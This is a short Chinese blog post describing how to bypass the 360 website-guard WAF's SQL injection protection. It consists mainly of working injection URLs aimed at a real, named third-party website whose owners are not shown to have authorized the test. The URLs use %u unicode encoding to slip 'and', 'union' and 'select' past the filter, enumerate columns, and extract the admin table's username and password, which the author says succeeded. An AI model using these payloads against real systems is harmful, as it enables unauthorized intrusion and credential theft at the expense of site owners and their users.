轻松bypass360网站卫士WAFSQL注入防护

随便网上找了一个网站,只是测试一下,没有干非法的事情!

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1





被拦截









换一个姿势看看:

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=1

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2







成功绕过







上面的描述已经可以证明很多了,还不服嘛?好的,我们来一个完整的绕过过程:



code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49%20order%20by%205





5
个字段,继续:

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,2,3,4,5 from admin





已经出来字段了



code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,username,3,4,5 from admin

 

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,password,3,4,5 from admin

 







成功注射出用户和密码

posted @ 2016-01-23 17:44  h4ck0ne  阅读(722)  评论(0编辑  收藏  举报